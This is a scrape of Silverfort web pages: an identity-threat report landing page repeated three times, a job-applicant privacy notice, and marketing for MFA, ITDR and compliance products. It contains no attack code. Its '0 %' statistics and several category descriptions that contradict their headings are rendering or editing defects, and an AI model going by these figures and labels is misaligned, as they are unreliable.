They aren’t vulnerabilities or attacks in themselves, but rather inherent weaknesses in identity infrastructure regularly used by threat actors in their attacks. As such, we decided to call these gaps Identity Threat Exposures (ITEs). The data in this report is gathered from hundreds of live production environments. Our hope is that the Identity Underground can help identity and security teams benchmark their security programs and empower them to make informed decisions on where to invest in identity security. Did you know? of all users are service accounts with high access privileges and low visibility. 0 % of user accounts are stale and do not perform any activity. 0 % of admin accounts are configured to have unconstrained delegation 0 % Identity Threat Exposures (ITEs) open your organization up to attack The Identity Underground maps out the most critical ITEs that allow attackers to access credentials, escalate privileges and move laterally, both on-prem and in the cloud. We have classified them into four categories: Password Exposers, Privilege Escalators, Lateral Movers and Protection Dodgers. ITEs are hard to eliminate and can result from a misconfiguration, malpractice, legacy identity infrastructure, or even built-in features. They are behind the steep increase in credential theft and lateral movement, a feature of nearly every attack. ITEs in this report are proven to be prevalent, impactful, and available for attackers to exploit. While there are multiple ITEs of different types, we’ve only included those that introduce a risk every organization is likely to experience. Password Exposers Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: NTLM authentication NTLMv1 authentication Admins with SPN Privilege Escalators Allows attackers to move laterally undetected. 
Related MITRE ATT&CK Technique: Privilege escalation Examples: Shadow admins Unconstrained delegation Lateral Movers Enables attackers to escalate existing access privileges. Related MITRE ATT&CK Technique: Lateral movement Examples: Service accounts Prolific users Easily cracked with brute-force attacks, NTLM authentication is a prime target for attackers looking to steal credentials and move deeper into an environment. Recent research by Proofpoint security shows threat actor TA577 stealing NTLM authentication information to obtain passwords. This is another example of a Password Exposer ITE. Get the full report It’s common practice for Active Directory (AD) to sync user hashes to the cloud IdP so users can access SaaS apps with the same credentials as on-prem resources. By syncing user passwords in this way, organizations inadvertently migrate on-prem identity weaknesses to the cloud and create a Password Exposer ITE. Attackers, including the Alphv BlackCat ransomware group, are known to hack cloud environments from on-prem settings. Get the full report A single misconfiguration in an Active Directory account spawns 109 new shadow admins on average. Shadow admins are user accounts with the power to reset passwords or manipulate accounts in other ways. Considered Privilege Escalators, attackers use Shadow Admins to change settings, permissions and give themselves more access to machines as they move deeper into an environment. Get the full report Almost a third of all user accounts are highly privileged service accounts. Service accounts are used for machine-to-machine communication, and are identities that have a lot of access and privileges. Attackers target service accounts, as they are often overlooked by security teams. Only 20% of companies are highly confident that they have visibility into every service account and can protect them. We consider unknown service accounts Lateral Mover ITEs. 
Get the full report What you can do today to protect your organization Identity remains an insidious part of nearly every attack. An underground world of Identity Threat Exposures contributes to an organization’s identity attack surface. The good news is that there are actions you can take today to eliminate these ITEs and bolster your identity security. 01 Know where you’re exposed and eliminate risk where possible Gain visibility into the ITEs in your environment, follow Microsoft’s best practices and weed out any ITEs that result from malpractices or misconfigurations. 02 Contain and monitor existing risks For ITEs that cannot be eliminated, such as service accounts or the use of NTLM, monitor these accounts closely for any sign of compromise. 03 Take preventative measures Apply identity segmentation rules or MFA policies to protect user accounts and enforce access policies on your service accounts. 04 Connect the identity and security teams Combine the areas of expertise of your identity and security teams to prioritize and implement fixes against ITEs.   Get the world’s first report 100% dedicated to revealing identity threat exposures. --- - Published: 2024-03-22 - Modified: 2024-09-13 - URL: https://www.silverfort.com/the-identity-underground-report-thn-li/ Silverfort THE IDENTITY UNDERGROUND REPORT The most common identity security gaps that lead to compromise Get the full report Your defenses are sky high – but underground you’re exposed. We noticed a gap in cybersecurity research. Most threat reports available today go into great detail about malware, threat actors, and attack kill chains, but they include very little data on the identity gaps and weaknesses that play a part in almost every cyber attack. We decided to change that. The Identity Underground is the first attempt to map out the most critical identity security weaknesses that lead to credential theft, privilege escalation or lateral movement — both on-prem and in the cloud. 
They aren’t vulnerabilities or attacks in themselves, but rather inherent weaknesses in identity infrastructure regularly used by threat actors in their attacks. As such, we decided to call these gaps Identity Threat Exposures (ITEs). The data in this report is gathered from hundreds of live production environments. Our hope is that the Identity Underground can help identity and security teams benchmark their security programs and empower them to make informed decisions on where to invest in identity security. Did you know? of all users are service accounts with high access privileges and low visibility. 0 % of user accounts are stale and do not perform any activity. 0 % of admin accounts are configured to have unconstrained delegation 0 % Identity Threat Exposures (ITEs) open your organization up to attack The Identity Underground maps out the most critical ITEs that allow attackers to access credentials, escalate privileges and move laterally, both on-prem and in the cloud. We have classified them into four categories: Password Exposers, Privilege Escalators, Lateral Movers and Protection Dodgers. ITEs are hard to eliminate and can result from a misconfiguration, malpractice, legacy identity infrastructure, or even built-in features. They are behind the steep increase in credential theft and lateral movement, a feature of nearly every attack. ITEs in this report are proven to be prevalent, impactful, and available for attackers to exploit. While there are multiple ITEs of different types, we’ve only included those that introduce a risk every organization is likely to experience. Password Exposers Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: NTLM authentication NTLMv1 authentication Admins with SPN Privilege Escalators Allows attackers to move laterally undetected. 
Related MITRE ATT&CK Technique: Privilege escalation Examples: Shadow admins Unconstrained delegation Lateral Movers Enables attackers to escalate existing access privileges. Related MITRE ATT&CK Technique: Lateral movement Examples: Service accounts Prolific users Easily cracked with brute-force attacks, NTLM authentication is a prime target for attackers looking to steal credentials and move deeper into an environment. Recent research by Proofpoint security shows threat actor TA577 stealing NTLM authentication information to obtain passwords. This is another example of a Password Exposer ITE. Get the full report It’s common practice for Active Directory (AD) to sync user hashes to the cloud IdP so users can access SaaS apps with the same credentials as on-prem resources. By syncing user passwords in this way, organizations inadvertently migrate on-prem identity weaknesses to the cloud and create a Password Exposer ITE. Attackers, including the Alphv BlackCat ransomware group, are known to hack cloud environments from on-prem settings. Get the full report A single misconfiguration in an Active Directory account spawns 109 new shadow admins on average. Shadow admins are user accounts with the power to reset passwords or manipulate accounts in other ways. Considered Privilege Escalators, attackers use Shadow Admins to change settings, permissions and give themselves more access to machines as they move deeper into an environment. Get the full report Almost a third of all user accounts are highly privileged service accounts. Service accounts are used for machine-to-machine communication, and are identities that have a lot of access and privileges. Attackers target service accounts, as they are often overlooked by security teams. Only 20% of companies are highly confident that they have visibility into every service account and can protect them. We consider unknown service accounts Lateral Mover ITEs. 
Get the full report What you can do today to protect your organization Identity remains an insidious part of nearly every attack. An underground world of Identity Threat Exposures contributes to an organization’s identity attack surface. The good news is that there are actions you can take today to eliminate these ITEs and bolster your identity security. 01 Know where you’re exposed and eliminate risk where possible Gain visibility into the ITEs in your environment, follow Microsoft’s best practices and weed out any ITEs that result from malpractices or misconfigurations. 02 Contain and monitor existing risks For ITEs that cannot be eliminated, such as service accounts or the use of NTLM, monitor these accounts closely for any sign of compromise. 03 Take preventative measures Apply identity segmentation rules or MFA policies to protect user accounts and enforce access policies on your service accounts. 04 Connect the identity and security teams Combine the areas of expertise of your identity and security teams to prioritize and implement fixes against ITEs.   Get the world’s first report 100% dedicated to revealing identity threat exposures. --- - Published: 2024-03-19 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-rh/ What is your identity protection challenge? Fill out this form and we’ll contact you to schedule an online or on-site demo. window. addEventListener("message", (ev) => { if (ev. data. type === 'hsFormCallback' && ev. data. eventName === 'onFormReady') { window. hero = new RevenueHero({ routerId: '1251' }) hero. schedule('hsForm_6432a41a-4dc5-45c9-8419-971d96121c55') } }); --- - Published: 2024-03-18 - Modified: 2024-10-03 - URL: https://www.silverfort.com/the-identity-underground-report/ Silverfort THE IDENTITY UNDERGROUND REPORT The most common identity security gaps that lead to compromise Get the full report Your defenses are sky high – but underground you’re exposed. We noticed a gap in cybersecurity research. 
Most threat reports available today go into great detail about malware, threat actors, and attack kill chains, but they include very little data on the identity gaps and weaknesses that play a part in almost every cyber attack. We decided to change that. The Identity Underground is the first attempt to map out the most critical identity security weaknesses that lead to credential theft, privilege escalation or lateral movement — both on-prem and in the cloud. They aren’t vulnerabilities or attacks in themselves, but rather inherent weaknesses in identity infrastructure regularly used by threat actors in their attacks. As such, we decided to call these gaps Identity Threat Exposures (ITEs). The data in this report is gathered from hundreds of live production environments. Our hope is that the Identity Underground can help identity and security teams benchmark their security programs and empower them to make informed decisions on where to invest in identity security. Did you know? of all users are service accounts with high access privileges and low visibility. 0 % of user accounts are stale and do not perform any activity. 0 % of admin accounts are configured to have unconstrained delegation 0 % Identity Threat Exposures (ITEs) open your organization up to attack The Identity Underground maps out the most critical ITEs that allow attackers to access credentials, escalate privileges and move laterally, both on-prem and in the cloud. We have classified them into four categories: Password Exposers, Privilege Escalators, Lateral Movers and Protection Dodgers. ITEs are hard to eliminate and can result from a misconfiguration, malpractice, legacy identity infrastructure, or even built-in features. They are behind the steep increase in credential theft and lateral movement, a feature of nearly every attack. ITEs in this report are proven to be prevalent, impactful, and available for attackers to exploit. 
While there are multiple ITEs of different types, we’ve only included those that introduce a risk every organization is likely to experience. Password Exposers Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: NTLM authentication NTLMv1 authentication Admins with SPN Privilege Escalators Allows attackers to move laterally undetected. Related MITRE ATT&CK Technique: Privilege escalation Examples: Shadow admins Unconstrained delegation Lateral Movers Enables attackers to escalate existing access privileges. Related MITRE ATT&CK Technique: Lateral movement Examples: Service accounts Prolific users Easily cracked with brute-force attacks, NTLM authentication is a prime target for attackers looking to steal credentials and move deeper into an environment. Recent research by Proofpoint security shows threat actor TA577 stealing NTLM authentication information to obtain passwords. This is another example of a Password Exposer ITE. Get the full report It’s common practice for Active Directory (AD) to sync user hashes to the cloud IdP so users can access SaaS apps with the same credentials as on-prem resources. By syncing user passwords in this way, organizations inadvertently migrate on-prem identity weaknesses to the cloud and create a Password Exposer ITE. Attackers, including the Alphv BlackCat ransomware group, are known to hack cloud environments from on-prem settings. Get the full report A single misconfiguration in an Active Directory account spawns 109 new shadow admins on average. Shadow admins are user accounts with the power to reset passwords or manipulate accounts in other ways. Considered Privilege Escalators, attackers use Shadow Admins to change settings, permissions and give themselves more access to machines as they move deeper into an environment. Get the full report Almost a third of all user accounts are highly privileged service accounts. 
Service accounts are used for machine-to-machine communication, and are identities that have a lot of access and privileges. Attackers target service accounts, as they are often overlooked by security teams. Only 20% of companies are highly confident that they have visibility into every service account and can protect them. We consider unknown service accounts Lateral Mover ITEs. Get the full report What you can do today to protect your organization Identity remains an insidious part of nearly every attack. An underground world of Identity Threat Exposures contributes to an organization’s identity attack surface. The good news is that there are actions you can take today to eliminate these ITEs and bolster your identity security. 01 Know where you’re exposed and eliminate risk where possible Gain visibility into the ITEs in your environment, follow Microsoft’s best practices and weed out any ITEs that result from malpractices or misconfigurations. 02 Contain and monitor existing risks For ITEs that cannot be eliminated, such as service accounts or the use of NTLM, monitor these accounts closely for any sign of compromise. 03 Take preventative measures Apply identity segmentation rules or MFA policies to protect user accounts and enforce access policies on your service accounts. 04 Connect the identity and security teams Combine the areas of expertise of your identity and security teams to prioritize and implement fixes against ITEs.   Get the world’s first report 100% dedicated to revealing identity threat exposures. --- - Published: 2024-03-14 - Modified: 2025-08-21 - URL: https://www.silverfort.com/job-applicant-privacy-policy/ Effective Date: March 13, 2024 This Privacy Notice explains how Silverfort, Inc. and its subsidiaries (collectively, “we,” “our,” or “us”) collects, uses, discloses, and otherwise processes personal information about our recruits and job applicants.   
This Privacy Notice is not a contract and does not create any legal rights or obligations. This Privacy Notice also is not intended to replace other notices or disclosures we may provide to you in connection with your application for a job or eventual role in our organization, which will supersede any conflicting disclosures contained in this Privacy Notice.

What is Personal Information?

When we use the term “personal information” in this Privacy Notice, we mean information that identifies, relates to, describes, is reasonably capable of being associated with, or could reasonably be linked, directly or indirectly, to you within the context of you acting as a job applicant. It does not include aggregated or deidentified information that is maintained in a form that is not capable of being associated with or reasonably linked to you.

Our Collection of Personal Information

During the recruiting process and when you apply for a job with us, we collect personal information about you, which may include:
- Contact Information: such as your full name, email address, home address and telephone number.
- Professional History & Qualifications: such as your previous employers, positions and work experience, professional licenses, certificates or other qualifications, and employment references or referrals.
- Educational History & Qualifications: such as your highest level of education, the schools you attended and when you were in attendance, degrees, certificates or other educational qualifications you earned, and your transcripts or educational references.
- Financial Information: such as your desired salary, bonus, benefits, expenses, and stock or equity grants.
- Background Check Information: when permitted by applicable law, we may choose to conduct a background check in connection with your application, such as to verify professional and educational history and qualifications or identify criminal history that may be relevant for a position with us. The results of the background check may include personal information we do not already have about you.
- Equal Opportunity Information: such as age, race, ethnicity, national origin, citizenship, sex, gender identity, sexual orientation, religion, disability or accommodation request, or marital or veteran status when you choose to provide it, but it will not be used in the hiring decision.
- Web-Related Information: such as technical details (including IP addresses) about your visit to our online services contained in log files or analytics data relating to your usage and activity on our online services. For more information, please refer to the general Privacy Policy on our website.
- Other Application and Interview Information: any personal information you choose to share with us in your interview or application, CV, resume, transcripts or other supporting documentation.
- Inferences: We may generate inferences or predictions about recruits and job applicants and their abilities, interests, or preferences based on the other personal information we collect and the interactions we have with them.

Although we often collect the personal information described above directly from you, we may also collect certain information from references, recruiters, job-related social media sites (such as LinkedIn), and publicly available sources. In addition, we may also collect this information through service providers and other third parties that collect it on our behalf, such as communications providers, scheduling providers and application providers.

Our Use of Personal Information

We use the personal information we collect during the recruiting process and when you apply for a job with us to:
- Identify you as a potential candidate and review your application for a position with us;
- Verify the information provided to us in connection with your application or received from other sources;
- Determine your eligibility and suitability for the potential position or other opportunities with us;
- Facilitate the recruiting and interview process;
- Communicate with you about the status of your application or other opportunities with us that may be of interest to you;
- Assess and improve the performance and success of our recruiting and hiring process;
- Conduct internal investigations, audits, compliance, risk management, problem resolution and security operations;
- Fulfill contractual obligations to you and other third parties;
- Comply with applicable law, rule, regulation, legal proceeding and government investigations, including relating to tax reporting and immigration.

Please note that if you accept an offer from us, we may transfer the personal information we collected about you during the recruiting and job application process to your personnel file with us. We may also process deidentified information that cannot reasonably be used to infer information about, or otherwise be linked to, a particular consumer or household. We commit to maintain and use the information in deidentified form and will not attempt to reidentify the information, except in instances where necessary for determining whether the deidentification process used by us satisfies the requirements under applicable law.

Disclosure of Personal Information

We may share your personal information with the following third parties for the purposes described below:
- Within the Company: We share personal information relating to recruits and job applicants within our family of companies for internal administrative purposes and uses that are consistent with this Privacy Notice. For example, the entity responsible for the job posting may share personal information about an applicant with another entity that is responsible for our organization-wide recruiting and employment decisions.
- Recruiters and Job Application Providers: We often engage recruiters and job application providers to assist us in identifying potential job applicants and processing job applications we receive. In order for these third parties to assist us in the recruiting and job application process, we share personal information about potential and current personnel with them.
- Other Service Providers: In addition to the third parties identified above, we engage other third parties to perform certain functions on our behalf in connection with the uses of personal information described in the Our Collection and Use of Personal Information sections above, including assisting us with our recruiting process, personnel management, benefits and services offerings, and other related business operations. Depending on the function the third party serves, the service provider may process personal information on our behalf or have access to personal information while performing functions on our behalf.
- Business Transaction or Reorganization: We may take part in or be involved with a corporate business transaction, such as a merger, acquisition, joint venture, or financing or sale of company assets. We may disclose personal information to a third party during negotiation of, in connection with or as an asset in such a corporate business transaction. Personal information may also be disclosed in the event of insolvency, bankruptcy, or receivership.
- Legal Obligations and Rights: We may disclose personal information to third parties, such as legal advisors and law enforcement: in connection with the establishment, exercise, or defense of legal claims; to comply with laws and regulations or to respond to lawful requests and legal process; to protect our rights and property and the rights and property of our agents, customers, and others, including to enforce our agreements, policies, and terms of use; to detect, suppress, or prevent fraud; to reduce credit risk and collect debts owed to us; to protect the health and safety of us, our customers, or any person; or as otherwise required by applicable law.
- Otherwise with Consent or Direction: We may disclose personal information about our recruits and applicants with your consent or direction.

In addition, some jurisdictions have different or specific legal requirements governing the use of personal information. We will comply with all laws and regulations, including local data protection laws, and will implement additional procedures and policies wherever needed to meet these requirements. Your personal information will be accessible in the country where we or our service providers are located, the UK, the US, Israel, and countries deemed as providing an adequate level of data protection.

No Sales or Targeted Advertising

We do not sell personal information about individuals in connection with job applications, and we do not share or otherwise disclose personal information about individuals acting in their capacity as job applicants to third parties for the purpose of displaying advertisements that are selected based on personal information obtained or inferred over time from an individual’s activities across businesses or distinctly-branded websites, applications, or other services (otherwise known as “targeted advertising” or “cross-context behavioral advertising”).

Data Retention

We retain personal information only for as long as is reasonably necessary to fulfil the purpose for which it was collected. However, if necessary, we may retain personal information for longer periods of time, until set retention periods and deadlines expire, for instance where we are required to do so in accordance with legal, tax, and accounting requirements set by a legislature, regulator, or other government authority. To determine the appropriate duration of the retention of personal information, we consider the amount, nature, and sensitivity of the personal information, the potential risk of harm from unauthorized use or disclosure of personal information, and whether we can attain our objectives by other means, as well as our legal, regulatory, tax, accounting, and other applicable obligations.

Once retention of the personal information is no longer necessary for the purposes outlined above, we will either delete or deidentify the personal information or, if this is not possible (for example, because personal information has been stored in backup archives), then we will not further process the personal information until deletion or deidentification is possible.

Your Privacy Rights

If you are a California resident, you may be able to exercise the following rights in relation to the personal information that we have collected about you (subject to certain limitations at law):
- The Right to Access/Know. The right to confirm whether we are processing personal information about you and, under California law only, to obtain certain personalized details about the personal information we have collected about you, including: the specific pieces of personal information we have collected about you; the categories of personal information collected; the categories of sources of the personal information; the purpose for which the personal information was collected; the categories of personal information that we have disclosed to third parties for a business purpose, and the categories of recipients to whom this information was disclosed; the categories of personal information shared for cross-context behavioral advertising purposes (if any), and the categories of recipients to whom the personal information was disclosed for those purposes; and the categories of personal information we have sold or shared about you (if any), and the categories of third parties to whom the information was sold or shared.
- The Right to Request Deletion. You have the right to request the deletion of personal information we have collected from you, subject to certain exceptions.
- The Right to Correction. You have the right to request that any inaccuracies in your personal information be corrected, taking into account the nature of the personal information and the purposes of the processing of your personal information.
- The Right to Limit Use and Disclosure of Sensitive Personal Information. You have the right to direct us to limit the use of your sensitive personal information to certain purposes, including to perform the services reasonably expected.
- The Right to Control Over Automated Decision-Making/Profiling. The right to direct us not to use automated decision-making or profiling for certain purposes.

You also have the right to not receive retaliatory or discriminatory treatment in connection with a request to exercise the above rights. However, please note that if the exercise of these rights limits our ability to process personal information, we may no longer be able to engage with you in the same manner.

Submitting Privacy Rights Requests

To submit a request to exercise one of the privacy rights identified above, please submit a request by emailing privacy@silverfort.com. Before processing your request, we will need to verify your identity and confirm you are a resident of a jurisdiction with a privacy right noted above. In order to verify your identity, we will generally either require the successful authentication of your work-related account, or...

---

- Published: 2024-03-13
- Modified: 2024-09-12
- URL: https://www.silverfort.com/use-cases/mfa-for-critical-assets/

Elevate your security with Silverfort MFA, the ultimate solution to protect all your critical assets. This agentless MFA solution is meticulously crafted to safeguard critical systems from identity-based threats, significantly diminishing the risk of unauthorized access. Leveraging Silverfort’s cutting-edge risk-based authentication and adaptable policies, user access is securely managed, allowing seamless authentication from any device, regardless of location or network. Silverfort’s platform enables a cohesive MFA strategy across diverse systems, enhancing overall security posture while minimizing administrative burdens. Explore the advantages of Silverfort’s MFA solution and fortify your security defenses today.
--- - Published: 2024-03-13 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-aws-cli/ Authenticate access to your AWS CLI with Silverfort's Agentless MFA solution --- - Published: 2024-03-07 - Modified: 2024-11-04 - URL: https://www.silverfort.com/an-osterman-research-report-the-state-of-the-identity-attack-surface-secweek-23/ The first comprehensive study on identity threat resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. 83% of organizations have experienced a security breach involving compromised credentials. Only 5.7% of organizations have full visibility into their service accounts. 89.8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2024-03-05 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-chubb-customers/ Welcome Chubb Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries' attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients.
Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn't be protected before 02 Securing Service Accounts Gain full visibility into your service accounts' inventory, activity, and behavior, and apply auto-created access policies to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn't rely on agents or proxies, with no code changes required, ensures the solution gets fully deployed in mere days Gain insight into your environment's security posture with Silverfort's free Identity Security Assessment. Learn More About the Silverfort Platform Disclaimer: The non-insurance products and services described herein are provided by Silverfort, a third-party vendor not affiliated with Chubb. The fact that offers and potential discounts may be made available by this third-party vendor is not an indication that insurance coverage is available under any Chubb policy for any particular incident. Referenced discounts on products and services offered by Silverfort are available only to Chubb policyholders with current in-force policies and are subject to applicable insurance laws. For products and services provided, the policyholder and third-party vendor would enter into a vendor relationship directly. Chubb will not be involved in the policyholder's decision to purchase services and has no responsibility for services that may be provided. --- - Published: 2024-03-05 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-cyberclan-customers/ Welcome CyberClan Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread.
Our technology turns the tables on adversaries' attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn't be protected before 02 Securing Service Accounts Gain full visibility into your service accounts' inventory, activity, and behavior, and apply auto-created access policies to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn't rely on agents or proxies, with no code changes required, ensures the solution gets fully deployed in mere days Gain insight into your environment's security posture with Silverfort's free Identity Security Assessment. Learn More About the Silverfort Platform --- - Published: 2024-03-01 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-insurance-partners-referral/ Silverfort ensures full compliance with all MFA requirements of cyber insurance policies by enabling MFA for all on-prem and cloud resources without the need for agents or proxies. With Silverfort, you can: Gain full visibility of all admin users Apply MFA protection on all admin access, including directory services, networking infrastructure, and command-line access Discover, monitor and protect every service account in your environments Identify active identity threats Complete this form and one of our cyber insurance experts will be in touch. --- - Published: 2024-02-16 - Modified: 2025-05-13 - URL: https://www.silverfort.com/industry/identity-security-for-manufacturing/ Manufacturing Identity security for manufacturing.
Secure every dimension of identity, from third-party access to hybrid environments to legacy applications. Get a demo or Take a platform tour Strengthening protection for legacy applications and systems. "Silverfort is helping us to secure and protect over 50 legacy manufacturing servers with RDP access, which is protected with MFA. Silverfort is not only providing MFA protection, they are also giving us actionable insights about threat detection into each authentication request." Fabian Jura, IT Infrastructure Manager, STARCO The challenge As STARCO scaled its business operations globally, it needed to implement more security controls across its environments. They sought to protect access to domain controllers via RDP, privileged access and service accounts. Our solution Within hours, STARCO had deployed MFA protection across all their resources and users, including admins and other privileged users. With the addition of fully automated visibility and protection of their service accounts, they knew they were securing every dimension of their identity. Secure every dimension of identity Securing the identity attack surface. Silverfort enables manufacturers to overcome the inherent risks of extensive third-party access and legacy apps and infrastructure, and become resilient to unauthorized access and ransomware propagation. MFA to legacy applications Enforce MFA access policies on all your AD mission-critical applications that you can't migrate to the cloud, across all local and remote access methods. Third-party access control Apply least-privilege access policies to your external contractors and software providers, and closely monitor their access patterns to detect any sign of compromise. Identity security for OT Enhance the separation between the OT and IT zones with identity-based segmentation and secure the service accounts that manage the flow of operational data from the shop floor to the analytics layer. Secure your operations and data.
Extend MFA to legacy applications Extend your existing MFA solution to legacy applications that weren't natively supported. This enables Silverfort to protect them with MFA, regardless of whether the application supports MFA. Read more Secure third-party access Silverfort does not require the installation of agents on protected devices, enabling it to easily enforce MFA on access attempts to any resource, including ones made by external vendors. Read more Protect hybrid environments Silverfort's integration with all IdPs enables it to monitor and analyze every user's full authentication trail context and extend MFA to the entire on-prem environment, including resources that couldn't be protected before. Read more Take a platform tour Learn more Explore blog --- - Published: 2024-02-05 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-hr-systems/ Protect all your sensitive HR data with Silverfort's MFA solution. Silverfort's Multi-Factor Authentication (MFA) solution strengthens HR system security by adding a robust layer of protection that goes beyond traditional passwords. By requiring additional verification methods, such as biometrics or one-time passcodes, it ensures that sensitive employee data remains secure against unauthorized access.
Its ability to enforce adaptive authentication policies means that security measures are intelligently tailored to the risk level of each access attempt, providing a seamless balance between security and user convenience. With comprehensive coverage, Silverfort extends its protective shield across all access points, including legacy and cloud-based systems, without the need for direct integration. This not only safeguards every entry to your HR information but also aids in compliance with regulatory mandates, ensuring your organization meets legal standards for data protection effortlessly. Designed for ease of use and seamless integration, Silverfort enables organizations to strengthen their security posture without disrupting HR operations or user experience. Its innovative approach to anomaly detection and response further ensures that any suspicious activity is swiftly identified and mitigated, keeping your HR systems safe and your employee data protected. Choose Silverfort’s MFA for a future where HR data security is uncompromised and user-friendly. --- - Published: 2024-01-17 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-security-insurance-requirements-secweek-jan24/ What to Know & How to Comply Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we’ll help you make sense of what you’ll need. 
Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2024-01-10 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-security-insurance-requirements-thn-email-jan-24/ Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we'll help you make sense of what you'll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2023-12-13 - Modified: 2025-07-21 - URL: https://www.silverfort.com/platform/identity-threat-detection-and-response/ Identity threat detection & response (ITDR) Detect and respond to identity threats. Anytime, anywhere. Make every second count. Detect and block credential access, privilege escalation, and lateral movement attempts, whether on-prem, in the cloud, or both. Get a demo or Take a tour Get ahead of identity threats with high-precision detection and in-line protection. Powered by our patented technology, our platform extends seamlessly throughout your entire identity infrastructure. With Silverfort embedded in the flow of all authentication requests, you get multilayered analysis of protocol anomalies, user behavior and malicious access patterns to disclose active attacks with the highest precision.
Complete end-to-end coverage Monitor every authentication and access attempt of every human and non-human user in your hybrid environment so you know your entire identity attack surface is covered. Highest-precision analysis and verification Reduce false positives and unburden your security team with context-driven analysis of every authentication attempt and effective verification of detected threats with MFA. Active real-time response Block malicious access attempts to secure your environment from adversarial activity, while providing your security team with actionable forensic data. Learn more about our platform Unparalleled depth and breadth of detection and protection. Discover Widest range of identity threat coverage. Detect all types of identity threats across the full range of attempted malicious access, from brute force and Kerberoasting to Pass the Ticket and DCSync. Analyze Granular insight into detected malicious activity. Dive into all the critical details of alerted activity and entities, and get vital context for investigation and efficient response. Protect Merge with your security stack. Share risk signals with your SIEM and XDR to enrich context and enhance accuracy, and integrate with SOAR remediation workflows. How Silverfort detects and responds to identity threats in real time. Take a tour of ITDR Learn more Explore blog --- - Published: 2023-12-11 - Modified: 2025-08-18 - URL: https://www.silverfort.com/use-cases/compliance/ Regulatory compliance Complete protection for built-in compliance. Compliance with regulations and standards is critical to every organization. Meet the identity security requirements of key cybersecurity regulations with Silverfort's MFA, PAM, and service account protection. Get a demo or Take a tour Your fast track to continuous regulatory compliance. Silverfort simplifies and expedites compliance by unifying the silos of identity infrastructure.
Our platform seamlessly extends security controls across every identity, resource, and environment, so you can check every box. End-to-end protection Our patented technology seamlessly fuses with your entire identity infrastructure, extending MFA access control across all on-prem and cloud resources. Accelerated ROI Our non-intrusive technology allows universal identity security at speed. Fully deploy in your production environment within days or weeks. Compliance assured Check off all key identity security requirements with universal coverage: MFA, service account visibility and protection, and privileged access security. Learn more about our platform Browse the regulations we can help you with:
- NY-DFS Part 500: Address NY-DFS identity protection requirements in a single solution.
- PCI DSS 4.0: Meet the new identity protection requirements listed in PCI DSS 4.0.
- NIS2 Directive: Meet NIS2 MFA requirements with universal coverage.
- Digital Operational Resilience Act (DORA): Comply with the identity security requirements outlined in DORA.
- MAS Cybersecurity: Align with MAS requirements relating to MFA, privileged access, and NHIs.
- UK Telecoms Security Framework (TSF): Comply with the privileged access protection requirements outlined in the TSF.
- CCOP for Critical Information Infrastructure 2.0: Align with the MFA, PAM and domain controller protection requirements of CCOP.
- UK Cyber Essentials and Cyber Essentials Plus: Map and adjust your identity protection measures to these best practices.
- NIST Cybersecurity Framework 2.0: Address all relevant aspects of NIST CSF 2.0 with unified identity protection.
- Cyber Assessment Framework (CAF): Meet the key identity security requirements outlined by CAF.
- HIPAA (Health Insurance Portability and Accountability Act): Comply with HIPAA by unifying strong access controls and MFA across all users, NHIs, service accounts and more.
- Essential Eight: Align with the ACSC Essential Eight Maturity Model with Silverfort.
- SWIFT Customer Security Controls Framework (CSCF) v2025: Comply with the updated Customer Security Controls Framework with Silverfort.
- Security of Critical National Infrastructure (SOCI) Act: Address the identity security aspects of SOCI and reduce your identity attack surface with ease.

